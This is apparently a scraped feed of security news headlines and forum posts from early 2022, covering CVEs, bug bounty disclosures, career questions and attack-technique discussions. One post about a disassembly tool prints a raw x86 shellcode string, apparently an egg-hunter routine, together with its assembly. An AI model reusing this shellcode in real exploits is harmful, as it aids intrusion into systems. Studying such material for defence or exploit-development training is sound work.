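    The maintainers of the Rust programming language released a security update for a high-severity vulnerability that a malicious party could abuse to purge files and directories from a vulnerable system in an unauthorized manner.  ( 1 min )
    How to use FaPro to simulate devices in bulk
    With FaPro, a single command directly creates a virtual network and simulates multiple different devices in it.  ( 1 min )
    "Report on the Current State and Development of Cybersecurity Awareness Education in Chinese Enterprises" released
    The "Report on the Current State and Development of Cybersecurity Awareness Education in Chinese Enterprises" (hereinafter "the Report") was released recently.  ( 1 min )
    "Measures for the Supervision of Information Technology Outsourcing Risks of Banking and Insurance Institutions" released, strictly controlling institutions' outsourcing risk
    The Measures comprise 7 chapters and 46 articles and set out comprehensive requirements for information technology outsourcing risk management at banking and insurance institutions.
    [Rootkit Research Series] Highly stealthy, highly persistent threats on the Windows platform
    This article discusses Rootkits from the angles of their lifetime, the effects they can achieve, and the feasibility of launching attacks with this technique.  ( 1 min )
    "Zhejiang Province Public Data Regulations" to take effect on March 1, again emphasizing personal information security
    The Regulations contain fifty-one articles and explicitly propose building a public data platform, establishing a public data sharing mechanism, and constructing a system for the orderly opening of public data.
    Expert judging panel of the first "New Forces in Cybersecurity" conference officially announced
    14 expert judges from the cybersecurity industry; come and take a look!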
  • Open

    Specific Payload makes a Users Posts unavailable
    FetLife disclosed a bug submitted by castilho: https://hackerone.com/reports/1176794 - Bounty: $100
  • Open

    ROP Hello World!
    submitted by /u/Kubiszox [link] [comments]
  • Open

    Ethical Hacking — Buffer Overflow Part 2
    Fuzzing is a software testing technique that supplies invalid data, that is, unexpected or random data, as input to a… Continue reading on Medium »  ( 2 min )

  • Open

    Is there anything equivalent to Java's RequestDispatcher.forward system in other programming languages?
    It's the easiest thing to leverage for pre-auth bugs: just looking at web.xml and leveraging internal forwards to touch APIs that normally require auth, and I would love to find something similar in other languages. The closest thing I've found is a special type of open redirect where the devs decided to keep previous session data, making it useful for auth bypasses in some PHP projects. See, the thing is, open redirects usually kill previous session data, making them useless for auth bypassing on their own, and the Java forward system is like an internal version/server-side version of a redirect that keeps session data and forwards everything along intact. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Could blind mass assignment be a rare type of bug?
    Some people know it as reflection binding, mass assignment or insecure direct object mapping, which is the opposite of insecure direct object reference: you're basically writing data instead of reading it, or appending data. So I've noticed in some places I'll send hidden parameters and the JSON response won’t show anything interesting, but I'll refresh the page and I'll get like a discount or something. Say I add the parameter isSpecialDiscount: true; the response won’t show anything related, so it's a blind mass assignment bug. In some cases I've seen partial blind mass assignment, where the JSON response will change to true for some things but still say false for others despite the request setting it as true, but when I refresh the page the server grants me the discount, proving it's processing the input and assigning my session a discount. I've never really seen people discuss blind or partial blind mass assignment being a thing, but I'm finding them a lot more now; it's weird. Usually I used to look at the JSON response to see if parameter values were changing, but I now see I can’t even trust that completely to prove a mass assignment bug exists. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Anyone who works in a SOC dealing with disadvantages in maturing due to lack of management experience?
    Just curious how some of you guys who work in a SOC, whether it’s as an analyst or engineer, with a manager who doesn’t have the background. Do you have a lot of influence in shaping the SOC? Run in to roadblocks justifying tools or maybe maturing your processes? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    Looking for first steps in changing careers with an unrelated(?) master's degree
    Hello /r/AskNetsec, this is my first post on here. I recently (coming up on a year) graduated with a M.A. in Forensic Psychology and Intelligence Analysis. This degree is not opening the doors in the psychology field I was hoping it would, and quite frankly, the work I have done in this field is not what I wanted out of my career. I have always been fascinated by cybersecurity, and it is a large part of the reason I decided to pursue the Intel part of my degree. My question to you all is this: What first steps would someone in my position take in trying to get into the Cybersecurity field? Ideally I would like to eventually work my way to a Security Analyst position. I have no qualms about starting at the lowest positions to work my way up, but am clueless on where to start. I have some coding knowledge in Python and Java, but as far as IT knowledge I am a total newbie. Are there certifications or courses I should prioritize? I would like to avoid going back to a university setting, as I have spent enough time and money doing that for the time being. Thank you to anybody who reads this and decides to respond, I really appreciate it. submitted by /u/Lambeau_Leap [link] [comments]  ( 1 min )
    Worth getting Net+/Sec+ with 3 years of exp in Blue Teaming?
    Heyhey, I'm not quite new to blue teaming (threat hunt & detection) but would like to have my options open in case I want to jump to a more senior tech role in the next year or so. I have a computer engineering degree and a SANS 401 (GSEC) cert too. Do you think it's worth getting? Thanks! submitted by /u/youmakemismile [link] [comments]  ( 1 min )
    Do RSA key fobs really strengthen security?
    Originally they did, I know. But there was this story about Chinese hackers compromising RSA, getting into the deepest levels of the production and key generation process. As a result, RSA alerted each and every customer of theirs and told them to use a personal PIN together with the code generated by the key fob. This is what I'm doing now on a daily basis. Now you have: your account password; your PIN, which you use together with the RSA-generated code; and the RSA-generated code. The RSA codes are compromised and you have to assume that there are some people out there knowing all the codes and algorithms. But that means they really aren't worth much; basically you only have a password and another, limited password called a PIN, which is usually shorter and numbers only. The most you can expect from this is that, let's say, 10 characters alphanumeric + 6 digits is somewhat better than just the 10 characters alphanumeric, plus there's a good chance that they are stored in different systems, so less likely to be seized at the same time by some black hats. Is that true or do these key fobs still have an added value? submitted by /u/mshthn [link] [comments]  ( 2 min )
    Simple question about nmap
    If my friend tells me what his public IP address is and I use nmap to do a port scan on his public IP address, then what exactly is being port scanned? Since every device in his house will have the same public IP address. submitted by /u/LagunaLoireFF8 [link] [comments]  ( 2 min )
    Received H1 bug bounty but think I maybe should have gotten more. Am I just being greedy?
    I have received a bounty just under 20k. I understand that that’s a lot of money but I am curious from experts whether this is about the most I’ll get and I should just move on. I can’t disclose too much but I found a way to make myself very very rich very easily (no actual tools or request spoofing required). I’ve thought of some ways that one could have theoretically easily taken the free money with no trace and ran if they were a legitimate crook. The bug had been around for a while (Longer than a week). Unsure of how bad it was in terms of actual internal damages. I can honestly say that I probably saved them potential millions if not actual millions. It feels like the amount I received is honestly not much at all given the severity of it. Having said all of that, it wasn’t very hard to reproduce. It was less of a penetration report involving much skill and more of a “holy shit guys, your product is clearly broken and I can’t believe this hasn’t been patched” Am I being completely unreasonable/greedy? I should also note that their market cap is far into the billions which is why I am making this post to begin with. They’re a major industry leader. submitted by /u/csthrowawayyyy [link] [comments]  ( 4 min )
    Is an associates degree worth getting?
    I was told experience and certs are mostly required for most jobs aside from roles in management, which requires a BS or even masters. So I am just curious if there is any value in just getting an AS. The role that currently interests me is SOC analyst if that helps. I also heard of the WGU online program for a BS or masters in cybersecurity. If I plan on doing management in the future, is it worth getting my degree through this program? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
  • Open

    How “Docker” can help you become a better hacker
    Continue reading on Medium »
    Ensuring protocol security with Immunefi bug bounty program
    Calling all devs and hackers. Help enhance our smart contract security and prevent thefts, freezes, and unintended changes and earn. Continue reading on Medium »  ( 2 min )
    I found a way to extract passwords from any iOS device. When I reported it to Apple? Silence.
    Apple’s Bug Bounty program, in theory, incentivizes programmers to report flaws they find in the company’s code. In practice? Not so much. Continue reading on Medium »  ( 3 min )
    What I learnt from reading 220* IDOR bug reports.
    IDOR — Insecure Direct Object Reference, abuse of the lack of authentication at every stage. Continue reading on Medium »  ( 3 min )
    First Bounty! Disable 2FA of any user via OTP bypass
    Getting that first bug bounty is a special feeling for any bug hunter. This is my first write up so please bear with me. Continue reading on Medium »  ( 1 min )
    First Valid BUG Finding At Microsoft And I Got the Acknowledgments Page Microsoft
    Hi Everyone. Continue reading on Medium »  ( 2 min )
    How I could have read your confidential bug reports by simple mail?
    Hey Everyone, Hope you’re doing safe and sound. Continue reading on InfoSec Write-ups »  ( 2 min )
    How I was able to takeover accounts in websites deal with Github as a SSO provider
    Introduction Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    pwntools on m1 mac?
    Hello, I'm working on creating a tutorial binary exploit for an M1-based Mac. For simplicity and portability I'm using an M1-based Kali VM and trying to use aarch64 shellcraft, but getting weird errors and wondering if anyone has successfully gotten pwn to work for them? The main error message when trying to use asm() on a shellcraft payload is: pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType() Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html but I don't know what binutils arch it's expecting; I tried installing a couple to no avail. Appreciate any of y'all's time, thanks. submitted by /u/superiorpyre [link] [comments]  ( 1 min )
    Fuzzing Ethereum Smart Contract using Echidna - Blockchain Security #1
    submitted by /u/pat_ventuzelo [link] [comments]
    Shellcode to x86, x64 Assembly
    Sharing a quick python3 command line tool I made to disassemble shellcode without having to remember the nuances of python2 v python3 strings and writing to a file each time: https://gitlab.com/stormblest/exploit-dev-tools/-/blob/main/shellcode2asm.py Includes python unittests in Gitlab. Example:
    ```
    $ python3 shellcode2asm.py "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" -a 32
    shellcode: "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"
    00000000 BB90509050 mov ebx,0x50905090
    00000005 31C9 xor ecx,ecx
    00000007 F7E1 mul ecx
    00000009 6681CAFF0F or dx,0xfff
    0000000E 42 inc edx
    0000000F 60 pusha
    00000010 8D5A04 lea ebx,[edx+0x4]
    00000013 B021 mov al,0x21
    00000015 CD80 int 0x80
    00000017 3CF2 cmp al,0xf2
    00000019 61 popa
    0000001A 74ED jz 0x9
    0000001C 391A cmp [edx],ebx
    0000001E 75EE jnz 0xe
    00000020 395A04 cmp [edx+0x4],ebx
    00000023 75E9 jnz 0xe
    00000025 FFE2 jmp edx
    ```
    submitted by /u/blutitanium [link] [comments]  ( 1 min )
  • Open

    Able to steal private files by manipulating response using Auto Reply function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1387320 - Bounty: $2000
    Able to steal private files by manipulating response using Compose Email function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1373784 - Bounty: $2000
    Subdomain Takeover
    Mail.ru disclosed a bug submitted by official_dhivish: https://hackerone.com/reports/1348504
    Cross site scripting via file upload in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by blubluuu: https://hackerone.com/reports/1433125 - Bounty: $500
  • Open

    Watering hole deploys new macOS malware, DazzleSpy, in Asia
    submitted by /u/dmchell [link] [comments]
    Extracting Cobalt Strike Beacon Configurations - Elastic Security Research
    submitted by /u/dmchell [link] [comments]
    RBCD WebClient attack | Franky's WebSite
    submitted by /u/dmchell [link] [comments]
    hlldz/RefleXXion: RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Major Linux PolicyKit security vulnerability uncovered: Pwnkit
    Article URL: https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/ Comments URL: https://news.ycombinator.com/item?id=30077665 Points: 7 # Comments: 0  ( 4 min )
    Rust vulnerability enables attackers to delete files and directories
    Article URL: https://developer-tech.com/news/2022/jan/24/rust-vulnerability-enables-attackers-delete-files-and-directories/ Comments URL: https://news.ycombinator.com/item?id=30072868 Points: 5 # Comments: 1  ( 4 min )
    Dark Souls servers taken down following discovery of critical vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/01/dark-souls-servers-taken-down-following-discovery-of-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30069692 Points: 3 # Comments: 0  ( 2 min )
  • Open

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    submitted by /u/TheSwedishChef24 [link] [comments]
    Mind Your Dependencies: Defending against malicious npm packages
    submitted by /u/SRMish3 [link] [comments]
    We purchased a machine from China and it came with malware preinstalled
    submitted by /u/lormayna [link] [comments]  ( 2 min )
    Cracking Randomly Generated Passwords
    submitted by /u/hyperreality_monero [link] [comments]  ( 1 min )
    RBCD attack & defense. From Domain User to DA on default domain controllers settings. Including webclient service activation
    submitted by /u/k3nfr4 [link] [comments]  ( 1 min )
    Finding vulnerabilities in Swiss Post’s future e-voting system - Part 1
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Recovering redacted information from pixelated videos
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    Solarwinds Web Help Desk: When the Helpdesk is too Helpful
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://seclists.org/oss-sec/2022/q1/80 Comments URL: https://news.ycombinator.com/item?id=30077271 Points: 112 # Comments: 41  ( 5 min )
    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Comments URL: https://news.ycombinator.com/item?id=30075993 Points: 4 # Comments: 2  ( 5 min )
  • Open

    3 must-know tools for information research
    During an internet search, we often come across data formats that at first glance cannot be used directly. Continue reading on Medium »  ( 3 min )
    Python: Speech To Text Conversion
    Simple Python code for converting audio data to text format Continue reading on Medium »  ( 1 min )
    Ukraine: tracking the deployments
    Making sense of the open source intelligence Continue reading on HOW TO STOP FASCISM »
  • Open

    Trainings or Courses or Labs?
    Howdy all, Any idea where I can find the following for Memory Forensics? I’m trying my best to learn the most of Memory Forensics! Have completed the Cyber Defenders lab! Free or Minimal Cost one would be appreciated as I’m just a beginner in my field! Thanks! submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    ftk Imager gets hung
    So I was attempting to take an E01 image of a file server. But it would just get hung right away. For FTK I tried to run it as a logical volume to image it, and still it would get hung. So I used a live boot of Linux and tried to use Guymager and it would just close. It is a RAID 6, I believe. Any other recommendations on how I could take an E01 image of the FS? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 2 min )
    CHFI certification is good at discounted price
    I have read many posts about EC Council not being good for any certification. But my question is if it's offered to me at a discounted price (99$) then it's good or still bad. Please note that this cert is being sponsored by my school, although it's not compulsory for me to join but I topped the merit list and they offered me to pay 99$ to get its voucher. So shall I go to it or simply deny it? submitted by /u/hardfire005 [link] [comments]  ( 2 min )
    Intro to Windows Registry artifacts with TryHackMe Windows Forensics Room.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    How do you think accuracy and precision applies to DFIR?
    I stumbled across accuracy and precision and was wondering how forensic examiners think it applies to DFIR, if at all. Maybe software, artifacts, attribution? Thoughts? https://preview.redd.it/a3xvkvnl1ud81.png?width=1024&format=png&auto=webp&s=d1ff7da688bfb06abfdaea08136cb0924c92c2fc submitted by /u/greyyit [link] [comments]  ( 3 min )
    Recovering deleted/cached images (Mac)
    I have been trying to find ways to recover deleted images from a discord server, and found that all content is stored in some form onto its cache in "~/Library/Application Support/discord/cache". The result is something like this. There seem to be some ways to recover it on windows, however, is it possible on macOS? I have no idea what I am looking at here, so forgive me for ignorance. https://preview.redd.it/brl4u4s2qtd81.png?width=1832&format=png&auto=webp&s=c87beca7931e74351107f7eea57abe24711b073c submitted by /u/Nitrote [link] [comments]  ( 1 min )
    How can I access mmssms.db without rooting phone?
    Hi, I would like to recover some deleted SMS messages. I do not know, how to access the mmssms.db, when plugging my phone to my PC without actually rooting it. What are my best options? Also how far back in time do you think I could recover the texts? submitted by /u/prois99 [link] [comments]  ( 1 min )
    Alcatel GO Flip V access?
    No idea where else to ask. There’s an Alcatel Go Flip V that I need text message logs from for a court case. I used to use BitPim for this sort of thing, but that hasn’t had profiles updated for years. I hate to phrase this in such a phone-specific way, but this phone is killing me, and I’ve tried a whole lot: Does anyone know any way to get legible texts from an Alcatel GO Flip V? Or is there anywhere else I should ask? submitted by /u/hmmqzaz [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-25 Review
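    2021 Cryptography Application Technology White Paper by ourren 2021 Network Detection and Response Report by ourren 2021 Cyberspace Mapping Annual Report by ourren Detection dilemmas and reflections under the trend toward fully encrypted traffic by ourren For more of the latest articles, visit SecWiki  ( 2 min )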
  • Open

    RESTler: Stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=30073154 Points: 4 # Comments: 0  ( 6 min )
  • Open

    My CRTO course and exam review
    Motivation of The Journey Continue reading on Medium »  ( 4 min )
  • Open

    ClickJackingggg!!
    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking… Continue reading on Medium »  ( 2 min )
  • Open

    Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies
    We observed a new surge of Agent Tesla and Dridex malware samples dropped by malicious Excel add-ins (XLL files). We focus here on Agent Tesla. The post Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies appeared first on Unit42.
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 7 min )
  • Open

    RWCTF 4th Desperate Cat Writeup
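    At Real World CTF 4th, I was honored to take part once again as a challenge author. I wrote a challenge called Desperate Cat, which tests exploitation of a file write into the Tomcat web directory to get a shell under strict constraints.  ( 2 min )
    FreeBuf Morning Report | 1,862 data breaches were recorded worldwide last year; Russian authorities arrest the leader of an international cybercrime group
    The Australian Securities and Investments Commission (ASIC) announced that it is working with five regtech companies to create a new platform intended to better handle information about listed companies.  ( 1 min )
    Attack Technique Analysis | Using Safe Mode to Break Through Security Product Defenses
    Sophos researchers recently discovered a new ransomware group named AvosLocker. The attackers evade detection by exploiting the protection gap that arises because security products cannot run in Safe Mode, and use exception configuration to keep remote control over the target.  ( 1 min )
    Building a web application firewall and traffic inspection with ModSecurity
    ModSecurity is an open-source, cross-platform web application firewall (WAF) engine for Apache, IIS and Nginx, developed by Trustwave's SpiderLabs.  ( 2 min )
    Obtaining Your Universal Token in AD FS
    Microsoft's AD FS (federated authentication) service is a cross-boundary identity and authentication service that lets services outside an AD domain authenticate with AD domain accounts, enabling SSO (single sign-on) across multiple entities or organizations.  ( 1 min )
    Research on Intranet Proxy Tools and Detection Methods
    Tunneling is a way of transferring data between networks by using the infrastructure of an internetwork. The data (or payload) carried through a tunnel can be frames or packets of a different protocol.  ( 1 min )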

  • Open

    What are Sock Puppets And How To Create One?
    Sock puppets are constantly engaging in different ways across social media trying to influence what we think and what we believe. So how to Continue reading on Medium »  ( 3 min )
    Analyzing a Twitter query in 5 minutes
    As part of analyzing a competitor's communications or searching for information on social networks, it can be… Continue reading on Medium »  ( 2 min )
    Bundesservice Telekommunikation unmasked: this intelligence service is behind it
    Look for one cover agency and find three. The simple tricks with which German intelligence services can be exposed. Continue reading on Medium »  ( 12 min )
    CyberSoc | Cyber Detective CTF Write Up — Life Online
    OSINT-focused CTF Challenges. OSINT in Twitter, Stego, Crypto and more Continue reading on Medium »  ( 3 min )
    OSINT Tools to Use
    OSINT tools: An expanding list Continue reading on Medium »  ( 14 min )
  • Open

    CVE-2022-0185 in Linux Kernel Can Allow Container Escape in Kubernetes
    Article URL: https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes Comments URL: https://news.ycombinator.com/item?id=30064884 Points: 2 # Comments: 0  ( 4 min )
    CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/4 Comments URL: https://news.ycombinator.com/item?id=30057900 Points: 2 # Comments: 0  ( 5 min )
    CVE-2021-3996 and CVE-2021-3995 in util-Linux's libmount
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/2 Comments URL: https://news.ycombinator.com/item?id=30056823 Points: 3 # Comments: 0  ( 3 min )
  • Open

    Cobalt Strike, a Defender’s Guide - Part 2
    submitted by /u/dmchell [link] [comments]
  • Open

    Using Twitter to notify careless developers — the unorthodox way (Or, how you could use GitHub to compromise 9.5K Twitter accounts without “hacking”)
    submitted by /u/sp00kyphiss [link] [comments]  ( 1 min )
    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    submitted by /u/jrozner [link] [comments]
    WordPress 5.8.2 Stored XSS Vulnerability
    submitted by /u/monoimpact [link] [comments]
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]
    How BRATA is monitoring your bank account | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    TypeScript scenario-based web application Fuzzing Framework, supports genetic algorithm and running on CI
    submitted by /u/hi120ki [link] [comments]
    Private Network Access: introducing preflights - Chrome Developers
    submitted by /u/rhaidiz [link] [comments]
    Qiling Sandbox Escape
    submitted by /u/ly4k_ [link] [comments]
    CVE-2022-0185 – What does the newest kernel exploit mean for Kubernetes
    submitted by /u/gemyougym [link] [comments]  ( 1 min )
  • Open

    HOW I hacked thousand of subdomains
    Hello everyone Continue reading on Medium »  ( 3 min )
    Hack into Skynet —  Real World CTF (2022) walkthrough
    Continue reading on InfoSec Write-ups »  ( 4 min )
    Journey for finding the CSRF Bug lead to the finding of the 403 Forbidden error
    Hello myself Manan Aggarwal and this is my First Blog Post that while I was finding the CSRF Bug that Lead to the finding of the 403… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec! Continue reading on InfoSec Write-ups »  ( 2 min )
    deBridge launches bug bounty on ImmuneFi
    This initiative is being funded by deBridge in order to improve network security and reliability for the network’s global community. Continue reading on Medium »  ( 2 min )
    Security Explained: Penetration Testing vs Bug Bounties
    In the world of application and network cybersecurity, you may have asked the question: what is penetration testing? Or what are bug… Continue reading on Medium »  ( 3 min )
  • Open

    Why are serializing bugs not a thing? Does code execution only occur during deserializing data only?
    Noticed all the fanfare around deserializing but not the opposite which is serializing a string and getting code execution from that. submitted by /u/Academic-Discount252 [link] [comments]  ( 2 min )
    Is authenticating by URL secure?
    The idea is to have a desktop .NET app that authenticates a user by having a built in browser that takes you to an SSO page, and only allows access to the app if you successfully arrive at a URL which is only accessible if you were able to successfully log in. Is this a secure method? I’m worried if there is some way of faking a URL. Is there some other alternative similar to this that is more secure, maybe something to do with certificates? I’m very new to this kind of stuff so any help is appreciated. submitted by /u/Sloathe [link] [comments]  ( 1 min )
    Looking to make a VLAN on my Home Network to protect a New Machine
    Two of my devices have had strange occurrences over the last couple of months. I am sure it's fine but it has been enough to where I don’t trust them. I have been building a desktop and I am about to finish. My question is how to best keep my new desktop with a fresh install of Windows 10 safe from any possible malware lingering on my other two machines on the network. Would a VLAN be the way to go on something like this? Like set up a VLAN specifically for my desktop. I am new at this stuff so I apologize in advance for any annoying assumptions or questions. Thank you so much for your consideration. EDIT: I also have an unmanaged switch and a Netgear wifi extender/access point at my disposal. My ISP is Xfinity. EDIT: VLAN needs a managed switch so it's a no go. submitted by /u/Zpointe [link] [comments]  ( 1 min )
    Could other logging systems have similar flaws to log4shell if fuzzed properly?
    The problem with log4shell is it was overblown and very buzz wordy when it relied on a known flaw from years ago called JNDI injection, but I'm thinking bigger than JNDI and Java. Could other programming languages like php, python, ruby, aspx/net framework have similar flaws to force their logging system to execute a log as code? Most logging systems don’t have fancy features like JNDI, LDAP etc., so I'm not sure what you could leverage to force code to be executed. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    How do I get out?
    Hi all, bit of an unusual one for you - I really want out of cybersecurity. I've got about 3 years of experience in netsec, mostly doing app and infrastructure security testing and honestly I hate it. Every project is a brand new technology I've got little experience in and I always end up feeling like I couldn't possibly have tested it 100% properly. I have major anxiety and panic issues and I'm finding the entire thing just too stressful and have completely burnt out in a few short years. So my question is: Has anyone successfully transitioned into another IT space from cyber security? I would love to just be a sysadmin and only have a single network and set of technologies to contend with, so I can feel like I'll truly master them and become properly proficient. The problem is I think I'll have a lot of stigma going into interviews as it will be very obvious I couldn't handle netsec and am looking for an out, especially considering as I'm on £50k and will likely need to take a cut down to 25k-35k to get into a role like this. So any advice anyone can offer for how to approach this situation? Do I need to go get an entirely different set of certs before I'll even be considered? signed, a very burnt out pentester submitted by /u/mekkr_ [link] [comments]  ( 8 min )
    Interview technical test
    Hey guys, I'm interviewing for a jr pen tester position and was asked for a technical test that consists in checking the security of an IP target that is hosted in the AWS cloud. I can use whatever tool I want as long as I find issues in the IP target and recommend ways to solve the issue. I have three days to do this test, and I'm looking to learn whatever I have to learn to take this next step that will change my life forever, but I have no idea how to start. Can you guys point me in the right direction? What resources do I have to start learning that? Thank you, and sorry if this doesn't fall in the scope of the subreddit. submitted by /u/Kelvien [link] [comments]  ( 2 min )
    A HUGE untapped attack surface for auth bypassing: Arbitrary Server Side Forwards also known as Unvalidated Forwards or Dangerous Forwards. It's basically SSRF-Lite.
    Barely any blogs or posts cover this stuff in depth enough for my liking and some of the biggest auth bypasses in Java apps stem from their requestdispatch forward feature which allows you to access internal authenticated APIs and endpoints as a non logged in session. What I'm wondering is if there's anything analogous like this in other popular languages like PHP, Ruby on Rails, Django etc. to do the same thing, and if not, is there any research regarding auth bypasses for open redirects, which are more client side based, and I don’t believe they can be used for auth bypasses since forwards are internal/server sided and keep session and parameter data intact whereas redirects are client sided and initialize fresh session data so they seem less useful than forwards. The only time I've seen an open redirect possibly bypass authentication is in combination with an SSRF or some feature where the web app follows the URL and then follows that URL's redirect internally. Would love fellow netsec peeps' insight on this under-researched phenomenon. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Interview Question
    Hi guys, I have an interview for Intern SOC analyst in one of the reputed organizations and the interview will consist of some technical lab as well, any idea what the lab questions can be?? How can I prepare for the lab examination? submitted by /u/Either_Attempt_9108 [link] [comments]  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Movies and series
    submitted by /u/omnifage [link] [comments]
    Dataset and model of the universe
    Gaia is a European space mission providing astrometry, photometry, and spectroscopy of more than 1000 million stars in the Milky Way. Also data for significant samples of extragalactic and Solar system objects is made available. The Gaia Archive contains deduced positions, parallaxes, proper motions, radial velocities, and brightnesses. Complementary information on multiplicity, photometric variability, and astrophysical parameters is provided for a large fraction of sources. http://cdn.gea.esac.esa.int/ Browse to https://gea.esac.esa.int/ for info. submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    Article URL: https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert/ Comments URL: https://news.ycombinator.com/item?id=30060422 Points: 2 # Comments: 0  ( 8 min )
    F5 fixes high-risk Nginx Controller vulnerability in January patch rollout
    Article URL: https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout Comments URL: https://news.ycombinator.com/item?id=30060420 Points: 2 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-01-24 Review
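    A First Look at Prototype Pollution in Node.js by ourren; 2021 Attack Technique Trends Report by ourren; SecWiki Weekly (Issue 412) by ourren; Research on Intranet Proxy Tools and Detection Methods by xiahao90; The Hash Game of Hunting Samples by Avenger. For more of the latest articles, visit SecWiki  ( 2 min )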
  • Open

    Exfiltration
    I'd like to start a brief discussion that might be a great learning opportunity for a lot of newbie forensic investigators - From a forensics standpoint, how would you tell if a file was exfiltrated? For this scenario, I'm thinking ransomware gang exfiltrates data before encrypting and is using a cloud based solution for storage. submitted by /u/DeadBirdRugby [link] [comments]  ( 3 min )
    Does anyone have experience with /media/0/.RecycleBin? (Android)
    If a file has a creation time and has this location, does this mean the creation time is the time the file was put there? And therefore "deleted"? submitted by /u/DHZX [link] [comments]  ( 1 min )
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

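    The Past and Present of Security Analytics
    How has security analytics changed over the past decade? This article explores the evolution and value of security analytics.  ( 1 min )
    Corporate email accounts of thousands of industrial organizations stolen and abused to launch follow-on attacks
    Attackers abuse the trust of corporate mailbox contacts to launch attacks, spreading from one industrial enterprise to another.  ( 1 min )
    At the company they just want to keep a low profile, but their skills won't allow it
    Tophant's (斗象科技) first internal attack-and-defense exercise has concluded successfully.
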